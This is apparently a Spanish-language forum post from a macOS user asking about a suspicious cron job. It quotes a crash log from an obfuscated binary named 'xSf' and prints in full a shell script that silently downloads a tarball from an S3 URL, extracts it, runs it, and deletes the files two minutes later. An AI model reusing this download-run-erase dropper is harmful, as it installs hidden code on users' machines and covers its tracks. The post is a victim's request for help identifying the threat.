Gracias a la función de correo de la Terminal, me llamó la atención que había algún tipo de trabajo cron en ejecución con algunos errores.
El correo del cron proporciona esta información:
2018-08-02 23:47:22.698 xSf[717:27543] *** Terminating app due to uncaught exception 'NSInvalidArgumentException', reason: '*** -[_NSPlaceholderData initWithBase64EncodedString:options:]: nil string argument'
*** First throw call stack:
(
0 CoreFoundation 0x00007fff57d622db __exceptionPreprocess + 171
1 libobjc.A.dylib 0x00007fff7eeffc76 objc_exception_throw + 48
2 CoreFoundation 0x00007fff57df3d7d +[NSException raise:format:] + 205
3 Foundation 0x00007fff59e028ee -[NSData(NSData) initWithBase64EncodedString:options:] + 84
4 xSf 0x000000010b54fd19 INJECTOR_decryptData_RNCryptor + 121
5 xSf 0x000000010b55010a -[l196gKNh f27WaC8u:path:] + 410
6 xSf 0x000000010b54ff2e -[l196gKNh s7PJWuXO:] + 158
7 xSf 0x000000010b552cd1 main + 225
8 libdyld.dylib 0x00007fff7fb19015 start + 1
)
libc++abi.dylib: terminating with uncaught exception of type NSException
/tmp/iu.sh: line 6: 717 Abort trap: 6 ./xSf
Parece que esto fue ejecutado por un script ubicado en: ~/Library/sandastros.np/sandastros.np cuyo contenido no puedo leer o descifrar.
Verifiqué el script ubicado en /tmp/iu.sh que contiene lo siguiente:
#!/bin/bash
/usr/bin/curl -s -L -o /var/tmp/xSf.tgz "https://s3.amazonaws.com/xsfer/xSf.tgz"
mkdir -p /var/tmp/xSf
tar -xzf /var/tmp/xSf.tgz -C /var/tmp/xSf/
cd /var/tmp/xSf/
./xSf
func_cccc(){
sleep 120
rm -rf /var/tmp/xSf
rm -rf /var/tmp/xSf.tgz
}
func_cccc &
Se puede acceder a esa URL, pero no quería descargar y abrir el archivo tar.
Los permisos de carpeta /tmp están configurados correctamente, aunque iu.sh tiene a mi usuario como propietario, por lo que parece permitir la instalación de cualquier cosa que pueda haberle dado permiso.
¿Alguna pista sobre qué es esto?